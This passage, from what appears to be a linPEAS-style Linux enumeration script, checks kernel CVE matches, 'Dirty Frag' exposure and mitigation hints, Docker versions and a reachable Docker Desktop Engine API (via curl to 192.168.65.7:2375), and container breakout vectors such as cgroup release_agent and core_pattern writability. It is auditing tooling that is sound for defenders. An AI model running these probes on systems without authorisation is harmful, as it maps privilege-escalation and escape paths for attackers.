   2472         if [ -r "$KERNEL_CVE_CFG_FILE" ]; then
   2473             KERNEL_CVE_CFG_SOURCE="$KERNEL_CVE_CFG_FILE"
   2474             break
   2475         fi
   2476     done
   2477     KERNEL_CVE_ALL_DATA=$(printf "%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s" \
   2478         "$KERNEL_CVE_DATA_1" "$KERNEL_CVE_DATA_2" "$KERNEL_CVE_DATA_3" "$KERNEL_CVE_DATA_4" "$KERNEL_CVE_DATA_5" \
   2479         "$KERNEL_CVE_DATA_6" "$KERNEL_CVE_DATA_7" "$KERNEL_CVE_DATA_8" "$KERNEL_CVE_DATA_9" "$KERNEL_CVE_DATA_10" \
   2480         "$KERNEL_CVE_DATA_11" "$KERNEL_CVE_DATA_12" "$KERNEL_CVE_DATA_13" "$KERNEL_CVE_DATA_14" "$KERNEL_CVE_DATA_15" \
   2481         "$KERNEL_CVE_DATA_16" "$KERNEL_CVE_DATA_17" "$KERNEL_CVE_DATA_18" "$KERNEL_CVE_DATA_19" "$KERNEL_CVE_DATA_20" \
   2482         "$KERNEL_CVE_DATA_21" "$KERNEL_CVE_DATA_22" "$KERNEL_CVE_DATA_23")
   2483     print_list "Operating system ............. $KERNEL_CVE_KERNEL_OS\n"
   2484     print_list "Kernel release ............... $KERNEL_CVE_KERNEL_RELEASE\n"
   2485     print_list "Comparable version ........... $KERNEL_CVE_KERNEL_VERSION\n"
   2486     print_list "Data chunk limit ............. max 25 rows per KERNEL_CVE_DATA_* variable (1..23)\n"
   2487     if [ -n "$KERNEL_CVE_CFG_SOURCE" ]; then
   2488         print_list "Kernel config source ......... $KERNEL_CVE_CFG_SOURCE\n"
   2489     else
   2490         print_list "Kernel config source ......... "
   2491         echo_not_found "not available"
   2492     fi
   2493     if [ "$KERNEL_CVE_KERNEL_OS" != "Linux" ]; then
   2494         print_list "Registry status .............. Linux kernel CVE datasets are not applicable to $KERNEL_CVE_KERNEL_OS\n" | sed -${E} "s,.*,${SED_GREEN},"
   2495         return 0
   2496     fi
   2497     KERNEL_CVE_MATCHES=0
   2498     while IFS="	" read -r KERNEL_CVE_ID KERNEL_CVE_NAME KERNEL_CVE_REQS KERNEL_CVE_TAGS KERNEL_CVE_RANK KERNEL_CVE_COMMENTS; do
   2499         [ -z "$KERNEL_CVE_ID" ] && continue
   2500         KERNEL_CVE_TOKEN_OK=1
   2501         if printf "%s" "$KERNEL_CVE_REQS" | grep -Eq '^pkg=|^ver|CONFIG_|sysctl:|cmd:|,pkg=|,ver|,CONFIG_|,sysctl:|,cmd:'; then
   2502             KERNEL_CVE_REQ_LINES=$(printf "%s" "$KERNEL_CVE_REQS" | tr ',' '\n')
   2503             while IFS= read -r KERNEL_CVE_REQ; do
   2504                 KERNEL_CVE_REQ=$(printf "%s" "$KERNEL_CVE_REQ" | sed 's/^ *//;s/ *$//')
   2505                 if ! kercve_eval_req_token "$KERNEL_CVE_REQ"; then
   2506                     KERNEL_CVE_TOKEN_OK=0
   2507                     break
   2508                 fi
   2509             done <<EOFR
   2510 $KERNEL_CVE_REQ_LINES
   2511 EOFR
   2512         else
   2513             if ! kercve_match_version_list "$KERNEL_CVE_REQS"; then
   2514                 KERNEL_CVE_TOKEN_OK=0
   2515             fi
   2516         fi
   2517         [ "$KERNEL_CVE_TOKEN_OK" -eq 0 ] && continue
   2518         # Some embedded datasets store rows as: <exploit_name> <cve_id> <versions> ...
   2519         # while others store: <cve_id> <exploit_name> <reqs> ...
   2520         # Normalize whichever column contains the CVE identifier, but keep printing
   2521         # all matched vulns even when no CVE exists for that row.
   2522         KERNEL_CVE_ID_RAW="$KERNEL_CVE_ID"
   2523         KERNEL_CVE_ID_NORM=$(kercve_normalize_cve_list "$KERNEL_CVE_ID_RAW")
   2524         if [ -z "$KERNEL_CVE_ID_NORM" ]; then
   2525             KERNEL_CVE_ID_NORM=$(kercve_normalize_cve_list "$KERNEL_CVE_NAME")
   2526             if [ -n "$KERNEL_CVE_ID_NORM" ]; then
   2527                 KERNEL_CVE_NAME="$KERNEL_CVE_ID_RAW"
   2528             fi
   2529         fi
   2530         if [ "$KERNEL_CVE_NAME" = "N/A" ] || [ "$KERNEL_CVE_NAME" = "n/a" ] || [ "$KERNEL_CVE_NAME" = "N\\A" ]; then
   2531             KERNEL_CVE_NAME=""
   2532         fi
   2533         if [ "$KERNEL_CVE_ID_RAW" = "N/A" ] || [ "$KERNEL_CVE_ID_RAW" = "n/a" ] || [ "$KERNEL_CVE_ID_RAW" = "N\\A" ]; then
   2534             KERNEL_CVE_ID_RAW=""
   2535         fi
   2536         KERNEL_CVE_PRINT_ID="$KERNEL_CVE_ID_NORM"
   2537         if [ -z "$KERNEL_CVE_PRINT_ID" ] && printf "%s" "$KERNEL_CVE_ID_RAW" | grep -Eq '^CVE-|^[0-9]{4}-[0-9]+$'; then
   2538             KERNEL_CVE_PRINT_ID=$(kercve_normalize_cve_list "$KERNEL_CVE_ID_RAW")
   2539         fi
   2540         KERNEL_CVE_MATCHES=$((KERNEL_CVE_MATCHES + 1))
   2541         kercve_print_match "$KERNEL_CVE_PRINT_ID" "$KERNEL_CVE_NAME" "$KERNEL_CVE_REQS" "$KERNEL_CVE_TAGS" "$KERNEL_CVE_RANK" "$KERNEL_CVE_COMMENTS"
   2542     done <<EOFD
   2543 $KERNEL_CVE_ALL_DATA
   2544 EOFD
   2545     KERNEL_CVE_PRINT_REASON="Kernel vulns found: $KERNEL_CVE_MATCHES"
   2546     if [ "$KERNEL_CVE_MATCHES" -gt 0 ]; then
   2547         print_list "$KERNEL_CVE_PRINT_REASON\n" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2548     else
   2549         print_list "No rule matched current kernel/version prerequisites in embedded datasets.\n" | sed -${E} "s,.*,${SED_GREEN},"
   2550     fi
   2551 }
   2552 
   2553 # Contributor: Arjay Saguisa
   2554 df43_norm_ver() {
   2555     printf "%s" "$1" | tr '-' '.' | sed 's/[^0-9.].*$//' | sed 's/\.\./\./g' | sed 's/^\.//' | sed 's/\.$//'
   2556 }
   2557 df43_ver_cmp() {
   2558     DF43_CURVER=$(df43_norm_ver "$1")
   2559     DF43_REQVER=$(df43_norm_ver "$3")
   2560     DF43_OP="$2"
   2561     [ -z "$DF43_CURVER" ] && return 1
   2562     [ -z "$DF43_REQVER" ] && return 1
   2563     DF43_CMP=$(awk -v a="$DF43_CURVER" -v b="$DF43_REQVER" '
   2564     function clean(v){gsub(/[^0-9]/,"",v); if(v=="")v=0; return v+0}
   2565     BEGIN{
   2566       na=split(a,A,"."); nb=split(b,B,"."); n=(na>nb?na:nb);
   2567       for(i=1;i<=n;i++){
   2568         va=(i<=na?clean(A[i]):0); vb=(i<=nb?clean(B[i]):0);
   2569         if(va<vb){print -1; exit}
   2570         if(va>vb){print 1; exit}
   2571       }
   2572       print 0
   2573     }')
   2574     case "$DF43_OP" in
   2575         '>=') [ "$DF43_CMP" -ge 0 ] ;;
   2576         '<')  [ "$DF43_CMP" -lt 0 ] ;;
   2577         *) return 1 ;;
   2578     esac
   2579 }
   2580 df43_ver_range() {
   2581     df43_ver_cmp "$1" '>=' "$2" && df43_ver_cmp "$1" '<' "$3"
   2582 }
   2583 checkDirtyFrag() {
   2584     (
   2585         DF43_KERNEL_OS=$(uname -s 2>/dev/null || echo unknown)
   2586         if [ "$DF43_KERNEL_OS" != "Linux" ]; then
   2587             echo "NOT APPLICABLE: Dirty Frag (CVE-2026-43284 / CVE-2026-43500) affects Linux kernels only." | sed -${E} "s,.*,${SED_GREEN},"
   2588             exit 0
   2589         fi
   2590         DF43_KERNEL_RELEASE=$(uname -r 2>/dev/null || echo unknown)
   2591         DF43_KERNEL_VERSION=$(df43_norm_ver "$DF43_KERNEL_RELEASE")
   2592         DF43_KBUILD=$(uname -v 2>/dev/null || echo unknown)
   2593         DF43_VERSION_KNOWN=""
   2594         [ -n "$DF43_KERNEL_VERSION" ] && DF43_VERSION_KNOWN="yes"
   2595         DF43_ESP_AFFECTED="yes"
   2596         DF43_RXRPC_AFFECTED="yes"
   2597         if [ "$DF43_VERSION_KNOWN" = "yes" ]; then
   2598             DF43_ESP_AFFECTED=""
   2599             if df43_ver_range "$DF43_KERNEL_VERSION" 4.11 5.10.255 \
   2600                 || df43_ver_range "$DF43_KERNEL_VERSION" 5.12 5.15.205 \
   2601                 || df43_ver_range "$DF43_KERNEL_VERSION" 5.16 6.1.171 \
   2602                 || df43_ver_range "$DF43_KERNEL_VERSION" 6.2 6.6.138 \
   2603                 || df43_ver_range "$DF43_KERNEL_VERSION" 6.7 6.12.87 \
   2604                 || df43_ver_range "$DF43_KERNEL_VERSION" 6.13 6.18.28 \
   2605                 || df43_ver_range "$DF43_KERNEL_VERSION" 7.0 7.0.5; then
   2606                 DF43_ESP_AFFECTED="yes"
   2607             fi
   2608             DF43_RXRPC_AFFECTED=""
   2609             if printf '%s' "$DF43_KERNEL_RELEASE" | grep -Eq '^5\.3(\.0)?-rc'; then
   2610                 printf '%s' "$DF43_KERNEL_RELEASE" | grep -Eq '^5\.3(\.0)?-rc[78]([-.]|$)' && DF43_RXRPC_AFFECTED="yes"
   2611             else
   2612                 if df43_ver_range "$DF43_KERNEL_VERSION" 5.3 6.18.29 \
   2613                     || df43_ver_range "$DF43_KERNEL_VERSION" 6.19 7.0.6 \
   2614                     || printf '%s' "$DF43_KERNEL_RELEASE" | grep -Eq '^7\.1(\.0)?-rc[12]([-.]|$)'; then
   2615                     DF43_RXRPC_AFFECTED="yes"
   2616                 fi
   2617             fi
   2618         fi
   2619         DF43_ESP_MODS="esp4 esp6 xfrm_user ipcomp4 ipcomp6"
   2620         DF43_RXRPC_MODS="rxrpc"
   2621         DF43_LOADED_ESP=""
   2622         DF43_LOADED_RXRPC=""
   2623         for DF43_MOD in $DF43_ESP_MODS; do
   2624             grep -qE "^${DF43_MOD} " /proc/modules 2>/dev/null \
   2625                 && DF43_LOADED_ESP="$DF43_LOADED_ESP $DF43_MOD"
   2626         done
   2627         for DF43_MOD in $DF43_RXRPC_MODS; do
   2628             grep -qE "^${DF43_MOD} " /proc/modules 2>/dev/null \
   2629                 && DF43_LOADED_RXRPC="$DF43_LOADED_RXRPC $DF43_MOD"
   2630         done
   2631         DF43_AUTO_ESP=""
   2632         DF43_AUTO_RXRPC=""
   2633         DF43_MODDEP="/lib/modules/${DF43_KERNEL_RELEASE}/modules.dep"
   2634         if [ -r "$DF43_MODDEP" ]; then
   2635             for DF43_MOD in $DF43_ESP_MODS; do
   2636                 if grep -qE "(^|/)${DF43_MOD}\.ko(\.[a-z]+)?:" "$DF43_MODDEP" 2>/dev/null; then
   2637                     case " $DF43_LOADED_ESP " in
   2638                         *" $DF43_MOD "*) : ;;
   2639                         *) DF43_AUTO_ESP="$DF43_AUTO_ESP $DF43_MOD" ;;
   2640                     esac
   2641                 fi
   2642             done
   2643             for DF43_MOD in $DF43_RXRPC_MODS; do
   2644                 if grep -qE "(^|/)${DF43_MOD}\.ko(\.[a-z]+)?:" "$DF43_MODDEP" 2>/dev/null; then
   2645                     case " $DF43_LOADED_RXRPC " in
   2646                         *" $DF43_MOD "*) : ;;
   2647                         *) DF43_AUTO_RXRPC="$DF43_AUTO_RXRPC $DF43_MOD" ;;
   2648                     esac
   2649                 fi
   2650             done
   2651         fi
   2652         DF43_BUILTIN_ESP=""
   2653         DF43_BUILTIN_RXRPC=""
   2654         DF43_KCFG=""
   2655         for DF43_C in /proc/config.gz "/boot/config-${DF43_KERNEL_RELEASE}" /boot/config; do
   2656             [ -r "$DF43_C" ] && { DF43_KCFG="$DF43_C"; break; }
   2657         done
   2658         if [ -n "$DF43_KCFG" ]; then
   2659             case "$DF43_KCFG" in
   2660                 *.gz) DF43_KCAT="zcat" ;;
   2661                 *)    DF43_KCAT="cat" ;;
   2662             esac
   2663             $DF43_KCAT "$DF43_KCFG" 2>/dev/null \
   2664                 | grep -qE '^(CONFIG_INET_ESP|CONFIG_INET6_ESP|CONFIG_XFRM_USER|CONFIG_INET_IPCOMP|CONFIG_INET6_IPCOMP)=y' \
   2665                 && DF43_BUILTIN_ESP="yes"
   2666             $DF43_KCAT "$DF43_KCFG" 2>/dev/null \
   2667                 | grep -qE '^CONFIG_AF_RXRPC=y' \
   2668                 && DF43_BUILTIN_RXRPC="yes"
   2669         fi
   2670         DF43_MITIG_ESP=""
   2671         DF43_MITIG_RXRPC=""
   2672         for DF43_MOD in $DF43_ESP_MODS; do
   2673             if grep -rEhsq "^[[:space:]]*(blacklist|install)[[:space:]]+${DF43_MOD}\b" \
   2674                  /etc/modprobe.d/ /run/modprobe.d/ /usr/lib/modprobe.d/ /lib/modprobe.d/ 2>/dev/null; then
   2675                 DF43_MITIG_ESP="yes"
   2676                 break
   2677             fi
   2678         done
   2679         for DF43_MOD in $DF43_RXRPC_MODS; do
   2680             if grep -rEhsq "^[[:space:]]*(blacklist|install)[[:space:]]+${DF43_MOD}\b" \
   2681                  /etc/modprobe.d/ /run/modprobe.d/ /usr/lib/modprobe.d/ /lib/modprobe.d/ 2>/dev/null; then
   2682                 DF43_MITIG_RXRPC="yes"
   2683                 break
   2684             fi
   2685         done
   2686         DF43_USERNS_OFF=""
   2687         if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then
   2688             [ "$(cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null)" = "0" ] \
   2689                 && DF43_USERNS_OFF="yes"
   2690         fi
   2691         if [ -r /proc/sys/user/max_user_namespaces ]; then
   2692             [ "$(cat /proc/sys/user/max_user_namespaces 2>/dev/null)" = "0" ] \
   2693                 && DF43_USERNS_OFF="yes"
   2694         fi
   2695         DF43_CAP_NET_ADMIN=""
   2696         if [ -r /proc/self/status ]; then
   2697             DF43_CAPEFF=$(awk '/^CapEff:/ {print $2}' /proc/self/status 2>/dev/null)
   2698             case "$DF43_CAPEFF" in
   2699                 "" | *[!0-9a-fA-F]*) : ;;
   2700                 *)
   2701                     DF43_CAPLO=$(printf '%s' "$DF43_CAPEFF" | tail -c 4)
   2702                     [ "$(( 0x${DF43_CAPLO} & 0x1000 ))" -ne 0 ] && DF43_CAP_NET_ADMIN="yes"
   2703                     ;;
   2704             esac
   2705         fi
   2706         DF43_OLDBUILD=""
   2707         DF43_BDATE=$(printf '%s' "$DF43_KBUILD" | sed -nE 's/.*([A-Z][a-z]{2} [A-Z][a-z]{2} +[0-9]{1,2} [0-9:]+ (UTC )?[0-9]{4}).*/\1/p')
   2708         if [ -z "$DF43_BDATE" ]; then
   2709             DF43_BDATE=$(printf '%s' "$DF43_KBUILD" | sed -nE 's/.*\(([0-9]{4}-[0-9]{2}-[0-9]{2})\).*/\1/p')
   2710         fi
   2711         if [ -n "$DF43_BDATE" ]; then
   2712             DF43_BE=$(date -d "$DF43_BDATE" +%s 2>/dev/null)
   2713             DF43_FE=$(date -d '2026-05-08' +%s 2>/dev/null)
   2714             if [ -n "$DF43_BE" ] && [ -n "$DF43_FE" ] && [ "$DF43_BE" -lt "$DF43_FE" ]; then
   2715                 DF43_OLDBUILD="yes"
   2716             fi
   2717         fi
   2718         if [ -n "$DF43_LOADED_ESP" ]; then
   2719             if [ "$DF43_ESP_AFFECTED" = "yes" ]; then
   2720                 echo "CVE-2026-43284 (xfrm-ESP): loaded:$DF43_LOADED_ESP" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2721             else
   2722                 echo "CVE-2026-43284 (xfrm-ESP): loaded:$DF43_LOADED_ESP but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN},"
   2723             fi
   2724         elif [ "$DF43_BUILTIN_ESP" = "yes" ]; then
   2725             if [ "$DF43_ESP_AFFECTED" = "yes" ]; then
   2726                 echo "CVE-2026-43284 (xfrm-ESP): built into kernel (modprobe blacklist ineffective)" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2727             else
   2728                 echo "CVE-2026-43284 (xfrm-ESP): built into kernel, but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN},"
   2729             fi
   2730         elif [ -n "$DF43_AUTO_ESP" ]; then
   2731             if [ "$DF43_ESP_AFFECTED" = "yes" ]; then
   2732                 echo "CVE-2026-43284 (xfrm-ESP): autoloadable:$DF43_AUTO_ESP" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2733             else
   2734                 echo "CVE-2026-43284 (xfrm-ESP): autoloadable:$DF43_AUTO_ESP but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN},"
   2735             fi
   2736         else
   2737             echo "CVE-2026-43284 (xfrm-ESP): not reachable on this kernel" | sed -${E} "s,.*,${SED_GREEN},"
   2738         fi
   2739         if [ -n "$DF43_LOADED_RXRPC" ]; then
   2740             if [ "$DF43_RXRPC_AFFECTED" = "yes" ]; then
   2741                 echo "CVE-2026-43500 (rxrpc): loaded:$DF43_LOADED_RXRPC" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2742             else
   2743                 echo "CVE-2026-43500 (rxrpc): loaded:$DF43_LOADED_RXRPC but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN},"
   2744             fi
   2745         elif [ "$DF43_BUILTIN_RXRPC" = "yes" ]; then
   2746             if [ "$DF43_RXRPC_AFFECTED" = "yes" ]; then
   2747                 echo "CVE-2026-43500 (rxrpc): built into kernel (modprobe blacklist ineffective)" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2748             else
   2749                 echo "CVE-2026-43500 (rxrpc): built into kernel, but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN},"
   2750             fi
   2751         elif [ -n "$DF43_AUTO_RXRPC" ]; then
   2752             if [ "$DF43_RXRPC_AFFECTED" = "yes" ]; then
   2753                 echo "CVE-2026-43500 (rxrpc): autoloadable:$DF43_AUTO_RXRPC" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2754             else
   2755                 echo "CVE-2026-43500 (rxrpc): autoloadable:$DF43_AUTO_RXRPC but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN},"
   2756             fi
   2757         else
   2758             echo "CVE-2026-43500 (rxrpc): not reachable on this kernel" | sed -${E} "s,.*,${SED_GREEN},"
   2759         fi
   2760         if [ "$DF43_MITIG_ESP" = "yes" ]; then
   2761             echo "modprobe mitigation (xfrm-ESP): present" | sed -${E} "s,.*,${SED_GREEN},"
   2762         else
   2763             echo "modprobe mitigation (xfrm-ESP): not found" | sed -${E} "s,.*,${SED_YELLOW},"
   2764         fi
   2765         if [ "$DF43_MITIG_RXRPC" = "yes" ]; then
   2766             echo "modprobe mitigation (rxrpc): present" | sed -${E} "s,.*,${SED_GREEN},"
   2767         else
   2768             echo "modprobe mitigation (rxrpc): not found" | sed -${E} "s,.*,${SED_YELLOW},"
   2769         fi
   2770         if [ "$DF43_USERNS_OFF" = "yes" ]; then
   2771             echo "Unprivileged user namespaces: disabled (breaks the public PoC)" | sed -${E} "s,.*,${SED_GREEN},"
   2772         else
   2773             echo "Unprivileged user namespaces: enabled" | sed -${E} "s,.*,${SED_YELLOW},"
   2774         fi
   2775         if [ "$DF43_CAP_NET_ADMIN" = "yes" ]; then
   2776             echo "Current process: CAP_NET_ADMIN present (matches public PoC requirement)" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2777         fi
   2778         if [ "$DF43_OLDBUILD" = "yes" ]; then
   2779             echo "Kernel build predates upstream fix (2026-05-08): likely unpatched unless distro backport." | sed -${E} "s,.*,${SED_YELLOW},"
   2780         fi
   2781         DF43_ESP_REACH=""
   2782         [ -n "$DF43_LOADED_ESP$DF43_AUTO_ESP" ] && DF43_ESP_REACH="yes"
   2783         [ "$DF43_BUILTIN_ESP" = "yes" ] && DF43_ESP_REACH="yes"
   2784         DF43_RXRPC_REACH=""
   2785         [ -n "$DF43_LOADED_RXRPC$DF43_AUTO_RXRPC" ] && DF43_RXRPC_REACH="yes"
   2786         [ "$DF43_BUILTIN_RXRPC" = "yes" ] && DF43_RXRPC_REACH="yes"
   2787         DF43_RC=0
   2788         if [ "$DF43_ESP_REACH" = "yes" ] && [ "$DF43_MITIG_ESP" != "yes" ]; then
   2789             if [ "$DF43_ESP_AFFECTED" != "yes" ]; then
   2790                 :
   2791             elif [ "$DF43_USERNS_OFF" = "yes" ]; then
   2792                 echo "CVE-2026-43284 reachable but public PoC blocked by disabled user namespaces." | sed -${E} "s,.*,${SED_YELLOW},"
   2793                 [ $DF43_RC -lt 1 ] && DF43_RC=1
   2794             else
   2795                 echo "LIKELY VULNERABLE to CVE-2026-43284 (xfrm-ESP)." | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2796                 DF43_RC=2
   2797             fi
   2798         fi
   2799         if [ "$DF43_RXRPC_REACH" = "yes" ] && [ "$DF43_MITIG_RXRPC" != "yes" ]; then
   2800             if [ "$DF43_RXRPC_AFFECTED" != "yes" ]; then
   2801                 :
   2802             elif [ "$DF43_USERNS_OFF" = "yes" ]; then
   2803                 echo "CVE-2026-43500 reachable but public PoC blocked by disabled user namespaces." | sed -${E} "s,.*,${SED_YELLOW},"
   2804                 [ $DF43_RC -lt 1 ] && DF43_RC=1
   2805             else
   2806                 echo "LIKELY VULNERABLE to CVE-2026-43500 (rxrpc)." | sed -${E} "s,.*,${SED_RED_YELLOW},"
   2807                 DF43_RC=2
   2808             fi
   2809         fi
   2810         if [ $DF43_RC -gt 0 ]; then
   2811             echo "Mitigation: 'install esp4/esp6/rxrpc /bin/false' in /etc/modprobe.d/, then rmmod;"
   2812             echo "or sysctl kernel.unprivileged_userns_clone=0; or apply distro patches."
   2813         fi
   2814         exit $DF43_RC
   2815     )
   2816 }
   2817 
   2818 checkCreateReleaseAgent(){
   2819   release_agent_breakout3="${release_agent_breakout3:-No}"
   2820   for ss in $(awk -F: '/^[0-9]+:/{print $2}' /proc/$$/cgroup 2>/dev/null); do
   2821       if unshare -UrmC --propagation=unchanged sh -c "mount -t cgroup -o $ss cgroup /tmp/cgroup_3628d4 >/dev/null 2>&1 && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then
   2822           release_agent_breakout3="Yes (unshare with $ss)"
   2823           umount /tmp/cgroup_3628d4 >/dev/null 2>&1
   2824           rm -rf /tmp/cgroup_3628d4 >/dev/null 2>&1
   2825           break
   2826       fi
   2827       umount /tmp/cgroup_3628d4 >/dev/null 2>&1
   2828       rm -rf /tmp/cgroup_3628d4 >/dev/null 2>&1
   2829   done
   2830 }
   2831 
   2832 checkDockerRootless() {
   2833   DOCKER_ROOTLESS="No"
   2834   if docker info 2>/dev/null|grep -q rootless; then
   2835     DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)"
   2836   fi
   2837 }
   2838 
   2839 echo_no (){
   2840   printf $DG"No\n"$NC
   2841 }
   2842 
   2843 enumerateDockerDesktopAPI() {
   2844   if ! [ "$SEARCHED_DOCKER_DESKTOP_API" ]; then
   2845     SEARCHED_DOCKER_DESKTOP_API="1"
   2846     # Docker Desktop exposes its internal Engine API on the VM services host 192.168.65.7.
   2847     # CVE-2025-9074 (fixed in Docker Desktop 4.44.3) let a container reach this UNAUTHENTICATED
   2848     # Engine API on 192.168.65.7:2375 even when /var/run/docker.sock was NOT mounted, enabling a
   2849     # full container escape (e.g. creating a container that bind-mounts the host filesystem).
   2850     # Ref: https://nvd.nist.gov/vuln/detail/CVE-2025-9074
   2851     ddEndpoint="http://192.168.65.7:2375/info"
   2852     ddInfoResponse=""
   2853     if [ "$(command -v curl 2>/dev/null || echo -n '')" ]; then
   2854       ddInfoResponse="$(curl -s --max-time 3 "$ddEndpoint" 2>/dev/null)"
   2855     elif [ "$(command -v wget 2>/dev/null || echo -n '')" ]; then
   2856       ddInfoResponse="$(wget -q -T 3 -O - "$ddEndpoint" 2>/dev/null)"
   2857     fi
   2858     if echo "$ddInfoResponse" | grep -q "ServerVersion"; then
   2859       echo "Docker Desktop internal Engine API (CVE-2025-9074) reachable at 192.168.65.7:2375 - container escape possible!" | sed -${E} "s,reachable at 192.168.65.7:2375,${SED_RED_YELLOW},g"
   2860       echo "$ddInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
   2861     fi
   2862   fi
   2863 }
   2864 
   2865 inDockerGroup() {
   2866   DOCKER_GROUP="No"
   2867   if groups 2>/dev/null | grep -q '\bdocker\b'; then
   2868     DOCKER_GROUP="Yes"
   2869   fi
   2870 }
   2871 
   2872 checkDockerVersionExploits() {
   2873   if echo "$dockerVersion" | grep -iq "not found"; then
   2874     VULN_CVE_2019_13139="$(echo_not_found)"
   2875     VULN_CVE_2019_5736="$(echo_not_found)"
   2876     VULN_CVE_2021_41091="$(echo_not_found)"
   2877     return
   2878   fi
   2879   VULN_CVE_2019_13139="$(echo_no)"
   2880   if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then
   2881     VULN_CVE_2019_13139="Yes"
   2882   fi
   2883   VULN_CVE_2019_5736="$(echo_no)"
   2884   if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then
   2885     VULN_CVE_2019_5736="Yes"
   2886   fi
   2887   VULN_CVE_2021_41091="$(echo_no)"
   2888   if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "20109" ]; then
   2889     VULN_CVE_2021_41091="Yes"
   2890   fi
   2891 }
   2892 
   2893 checkProcSysBreakouts(){
   2894   can_open_for_write() {
   2895     if [ -e "$1" ] && command -v dd >/dev/null 2>&1 && dd if=/dev/null of="$1" bs=1 count=0 conv=notrunc >/dev/null 2>&1; then
   2896       echo Yes
   2897     else
   2898       echo No
   2899     fi
   2900   }
   2901   dev_mounted="No"
   2902   if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then
   2903     dev_mounted="Yes";
   2904   fi
   2905   proc_mounted="No"
   2906   if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then
   2907     proc_mounted="Yes";
   2908   fi
   2909   if command -v unshare >/dev/null 2>&1 && command -v sh >/dev/null 2>&1; then
   2910     run_unshare=$(unshare -UrmC sh -c 'echo -n Yes' 2>/dev/null)
   2911   fi
   2912   if ! [ "$run_unshare" = "Yes" ]; then
   2913     run_unshare="No"
   2914   fi
   2915   if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then 
   2916     release_agent_breakout1="Yes"
   2917   else 
   2918     release_agent_breakout1="No"
   2919   fi
   2920   release_agent_breakout2="No"
   2921   mkdir -p /tmp/cgroup_3628d4
   2922   mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null
   2923   if [ $? -eq 0 ]; then 
   2924     release_agent_breakout2="Yes"; 
   2925     umount /tmp/cgroup_3628d4 >/dev/null 2>&1
   2926     rm -rf /tmp/cgroup_3628d4
   2927   else 
   2928     mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null
   2929     if [ $? -eq 0 ]; then 
   2930       release_agent_breakout2="Yes"; 
   2931       umount /tmp/cgroup_3628d4 >/dev/null 2>&1
   2932       rm -rf /tmp/cgroup_3628d4
   2933     else 
   2934       checkCreateReleaseAgent
   2935     fi
   2936   fi
   2937   rm -rf /tmp/cgroup_3628d4 2>/dev/null
   2938   # Prefer zero-byte open-for-write checks here so special files are validated more accurately without trying to change their contents.
   2939   core_pattern_breakout="$(can_open_for_write /proc/sys/kernel/core_pattern)"
   2940   modprobe_binary="$(ls -l "$(cat /proc/sys/kernel/modprobe 2>/dev/null)" 2>/dev/null || echo No)"
   2941   modprobe_config_writable="$(can_open_for_write /proc/sys/kernel/modprobe)"
   2942   panic_on_oom_dos="$(can_open_for_write /proc/sys/vm/panic_on_oom)"
   2943   panic_sys_fs_dos="$(can_open_for_write /proc/sys/fs/suid_dumpable)"
   2944   binfmt_misc_breakout="$(can_open_for_write /proc/sys/fs/binfmt_misc/register)"
   2945   proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes || echo No)"
   2946   sysreq_trigger_dos="$(can_open_for_write /proc/sysrq-trigger)"
   2947   kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes) 2>/dev/null || echo No)"  # Kernel Exploit Dev
   2948   kallsyms_readable="$( (head -n 1 /proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel Exploit Dev
   2949   self_mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
   2950   if [ "$(head -n 1 /proc/kcore 2>/dev/null)" ]; then kcore_readable="Yes"; else kcore_readable="No"; fi
   2951   kmem_readable="$( (head -n 1 /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
   2952   kmem_writable="$(can_open_for_write /proc/kmem)"
   2953   mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)"
   2954   mem_writable="$(can_open_for_write /proc/mem)"
   2955   sched_debug_readable="$( (head -n 1 /proc/sched_debug > /dev/null && echo Yes) 2>/dev/null || echo No)"
   2956   mountinfo_readable="No"
   2957   for mountinfo_file in /proc/[0-9]*/mountinfo; do
   2958     if [ -r "$mountinfo_file" ]; then
   2959       mountinfo_readable="Yes"
   2960       break
   2961     fi
   2962   done
   2963   uevent_helper_breakout="$(can_open_for_write /sys/kernel/uevent_helper)"
